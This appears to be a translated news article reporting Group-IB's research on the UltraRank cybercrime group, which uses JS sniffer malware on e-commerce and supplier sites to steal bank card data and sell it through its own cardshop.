The researchers write that, having finally replaced banking Trojans, groups using JS sniffers have become the main suppliers of text databases of bank cards for sales on specialized hacker forums since the end of 2019. JS sniffers are one of the fastest growing threats today. In less than one and a half, the number of unique malware families discovered by Group-IB experts more than doubled: today there are already 96 of them.
Group-IB reminds that each family of JS sniffers is a collection of samples with minor differences in the code that are embedded on sites to intercept user input – bank card numbers, names, addresses, logins, passwords, and so on. JS sniffer operators choose sites built on certain CMS, as a rule, rarely updated, that do not contain 3DSecure protection systems. The data stolen in this way is transferred to the cybercriminals' server, and then sold on the darknet on carder forums, the bulk of which are Russian-speaking cybercriminals.
If there are no behavioral analysis systems on the side of the issuing bank that issued the card stolen by the JS sniffer to distinguish the actions of a real user from an attacker, cybercriminals cash out the money from the cards sold through the purchase and further resale of various goods.
According to experts, UltraRank includes Russian-speaking hackers. The group operates with three families of JS sniffers called FakeLogistics, WebRank and SnifLite. During the period of its activity, UltraRank has built an autonomous business model with its own technical and organizational structure, as well as its own system for selling and monetizing stolen payment information. For example, the group has its own cardshop ValidCC, according to internal statistics of which, in 2019, its owners earned $ 5,000-7,000 a day selling bank card data that the group stole themselves, and hackers paid another $ 25,000-30,000. other vendors of stolen payment information that have listed items in their cardshop.
Since 2015, UltraRank has infected 691 sites primarily in Europe, Asia and America. The attackers also chose larger targets for themselves, for which much more complex attacks were planned through the supply chain. In particular, 13 online commerce service providers fell victim to them, which include various advertising and browser notification services, web design agencies, marketing agencies, website developers, and so on. By injecting malicious code into their scripts, the attackers intercepted customer bank card data on the websites of all stores that use the products or technologies of these suppliers. Their infection could bring cybercriminals a total of more than 100,000 infected sites.
In February 2020, Group-IB specialists noticed that five sites created by the American marketing agency The Brandit Agency for their corporate clients were infected with JS sniffers. The experts immediately tried to contact the agency, but there was no reaction: later the malicious code was removed from the sites. Investigating this attack allowed the team to discover the attackers' infrastructure and connect it to other, earlier incidents that also used JS sniffers, and reconstructed the full history of the attacks.
Over the past five years, UltraRank has repeatedly changed its infrastructure and modified the malicious code in its arsenal, as a result of which experts from other companies have long mistakenly attributed its attacks to various attackers. UltraRank strengthened its position by actively fighting competitors. She hacked already compromised sites and added her JS sniffer to the already injected code of a rival criminal group: in this way, the stolen bank card data was “sent” to two hacker groups at once.
“The latency of cybercrime using JS sniffers leaves a lot of room for these cybercriminals. The malicious code is introduced into the site completely unnoticed for the site owner and for its users, and can “collect” customer bank card data for a long time, remaining in the shadows. However, the secrecy of this crime does not reduce its danger: in addition to the users themselves, banks and online business owners can fall into this chain. Do not underestimate this threat and, given the growth spurt in the JS sniffing market that took place in less than 1.5 years, online businesses using online payments need to regularly conduct express audits of their sites to find and remove of such malicious code, ”says Viktor Okorokov, Group-IB Threat Intelligence specialist.